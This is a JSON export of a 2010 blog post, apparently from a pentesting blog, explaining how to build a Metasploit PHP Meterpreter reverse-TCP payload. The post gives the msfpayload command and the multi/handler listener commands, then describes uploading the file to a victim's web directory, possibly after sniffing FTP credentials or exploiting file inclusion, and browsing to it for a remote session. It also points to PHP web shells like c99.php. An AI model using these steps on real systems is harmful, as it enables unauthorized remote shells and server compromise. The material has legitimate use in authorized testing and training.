{"id":412,"date":"2010-07-03T03:03:31","date_gmt":"2010-07-03T08:03:31","guid":{"rendered":"http:\/\/zitstif.no-ip.org\/?p=412"},"modified":"2011-05-14T21:13:21","modified_gmt":"2011-05-15T02:13:21","slug":"php-meterpreter-payload","status":"publish","type":"post","link":"http:\/\/zitstif.no-ip.org\/?p=412","title":{"rendered":"PHP meterpreter payload"},"content":{"rendered":"<p>Today I&#8217;ll be showing a new feature that has just been added to the Metasploit framework.<\/p>\n<p><a title=\"http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html\" href=\"http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html\" target=\"_blank\">http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html<\/a><\/p>\n<p>When one can upload files to a www directory and wants further leverage on the system, one may want to do this via PHP in some way. PHP shells are a viable solution for this problem, if certain parameters are met.<\/p>\n<p>One parameter that must be met is that the server must allow system commands through PHP. If the server permits system commands through PHP, then a PHP shell will be a great tool for further assessment and possible privilege escalation.<\/p>\n<p>If you surf around on the internet looking for PHP shells, you&#8217;ll find ones such as c99.php and DXshell.php. Honestly, check out: <a title=\"php-shell.org\/\" href=\"http:\/\/php-shell.org\/\" target=\"_blank\">php-shell.org<\/a><\/p>\n<p>Now, as part of the Metasploit framework, pentesters can use meterpreter as a PHP payload. I will run through a quick example of how to create a meterpreter PHP payload and how to execute it:<\/p>\n<pre lang=\"bash\">msfpayload php\/meterpreter\/reverse_tcp LHOST=127.0.0.1 LPORT=4444 R &gt; mypayload.php<\/pre>\n<p>You can use this file on the web server to get a reverse connection. Hopefully, you have gained some sort of write access to the www directory on the victim&#8217;s website (for example, by sniffing or capturing FTP credentials to the victim&#8217;s website). 
Other scenarios for gaining access to the system may include local or remote file inclusion.<\/p>\n<p>On the attacker&#8217;s end, all you have to do is set up msfconsole and use the multi\/handler. The following commands should be issued:<\/p>\n<p>msf &gt; use multi\/handler<br \/>\nmsf &gt; set PAYLOAD php\/meterpreter\/reverse_tcp<br \/>\nmsf &gt; set LHOST 127.0.0.1<br \/>\nmsf &gt; set LPORT 4444<br \/>\nmsf &gt; exploit -z -j<\/p>\n<p>All the attacker needs to do now is simply visit the page http:\/\/victim.com\/mypayload.php, and ideally the attacker should get a meterpreter session.<\/p>\n<p>More to come as usual&#8230;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Today I&#8217;ll be showing a new feature that has just been added to the Metasploit framework. http:\/\/blog.metasploit.com\/2010\/06\/meterpreter-for-pwned-home-pages.html When one can upload files to a www directory and wants further leverage on the system, one may want to do this via PHP in some way. 
PHP shells are a viable solution for this problem, if certain &hellip; <a href=\"http:\/\/zitstif.no-ip.org\/?p=412\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">PHP meterpreter payload<\/span> <span class=\"meta-nav\">&rarr;<\/span><\/a><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[244,28,124,239,240,242,243,241],"class_list":["post-412","post","type-post","status-publish","format-standard","hentry","category-posts","tag-local-file-inclusion","tag-metasploit","tag-meterpreter","tag-php","tag-php-shells","tag-php-system","tag-remote-file-inclusion","tag-reverse_tcp"],"_links":{"self":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/412","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=412"}],"version-history":[{"count":9,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/412\/revisions"}],"predecessor-version":[{"id":483,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=\/wp\/v2\/posts\/412\/revisions\/483"}],"wp:attachment":[{"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=412"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=412"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/zitstif.no-ip.org\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=412"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templat
ed":true}]}}